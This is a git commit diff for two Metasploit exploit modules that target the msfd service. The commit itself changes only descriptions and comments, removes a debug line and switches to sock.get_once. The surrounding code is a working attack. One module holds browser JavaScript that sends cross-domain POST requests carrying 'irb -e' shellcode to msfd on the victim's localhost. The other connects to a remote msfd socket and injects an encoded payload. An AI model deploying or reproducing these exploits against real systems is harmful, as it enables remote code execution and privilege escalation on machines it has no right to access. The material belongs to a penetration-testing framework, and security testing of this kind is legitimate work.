Minor changes in description and comments

2018-04-22 21:27:25 +02:00 · 2018-04-22 21:27:25 +02:00 · df7db27106
parent 940028f719
commit df7db27106
2 changed files with 12 additions and 13 deletions
--- a/modules/exploits/multi/browser/msfd_rce_browser.rb
+++ b/modules/exploits/multi/browser/msfd_rce_browser.rb
@ -19,8 +19,8 @@ class MetasploitModule < Msf::Exploit::Remote
      this module places the payload in the POST-data. These POST-requests
      can be sent cross-domain and can therefore be sent to localhost on the
      victim's machine. The msfconsole-command to execute code is 'rbi -e
-      "PAYLOAD"'.
-        },
+      "CODE"'.
+      },
      'License'        => BSD_LICENSE,
      'Author'         => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
      'Platform'       => 'ruby',
@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'DisableNops' =>  'True',
          'BadChars' => "\x22\x0a"
        },
-      'DisclosureDate' => 'Apr 11 2018',
+      'DisclosureDate' => 'Apr 11 2018',  # Vendor notification
      'DefaultTarget'  => 0))

      register_options([
@ -60,7 +60,6 @@ class MetasploitModule < Msf::Exploit::Remote
 <body>
 <script>
 var #{var1} = new XMLHttpRequest();
-#{var1}.onreadystatechange = function() { if (#{var1}.readyState == 4) {console.log(#{var1}); } }
 #{var1}.open("POST","http://#{datastore['REMOTE_IP']}:#{datastore['REMOTE_PORT']}/", true);
 var #{var2} = String("#{shellcode}");
 #{var1}.send("irb -e \\"" + #{var2} + "\\"\\n");
--- a/modules/exploits/multi/misc/msfd_rce_remote.rb
+++ b/modules/exploits/multi/misc/msfd_rce_remote.rb
@ -10,15 +10,15 @@ class MetasploitModule < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
-      'Name'           => 'MSFD remote socket',
+      'Name'           => 'Metasploit msfd Remote Code Execution',
      'Description'    => %q{
      Metasploit's msfd-service makes it possible to get a msfconsole-like
      interface over a TCP socket. If this socket is accessible on a remote
-      interface, an attacker can execute commands.
+      interface, an attacker can execute commands on the victim's machine.

-      If msfd is running with higher privileges than the current user, this
-      module can also be used for privilege escalation. In that case, port
-      forwarding on the compromised host can be used.
+      If msfd is running with higher privileges than the current local user,
+      this module can also be used for privilege escalation. In that case,
+      port forwarding on the compromised host can be used.

      Code execution is achieved with the msfconsole command: irb -e 'CODE'.
      },
@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Payload'        =>
        {
          'Space'    => 8192,   # Arbitrary limit
-          'BadChars' => "\x27\x0a", # Quote nece
+          'BadChars' => "\x27\x0a",
          'DisableNops' => true
        },
      'Targets'  =>
@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
          [ 'Automatic', { } ]
        ],
      'Privileged'     => false,
-      'DisclosureDate' => 'Apr 11 2018',
+      'DisclosureDate' => 'Apr 11 2018',  # Vendor notification
      'DefaultTarget'  => 0))

    register_options(
@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote

  def check
    connect
-    data = sock.get
+    data = sock.get_once
    if data.include?("msf")
      disconnect
      return Exploit::CheckCode::Appears
@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote

  def exploit
    connect
-    data = sock.get
+    data = sock.get_once
    sock.put "irb -e '" + payload.encoded + "'\n"
    disconnect
  end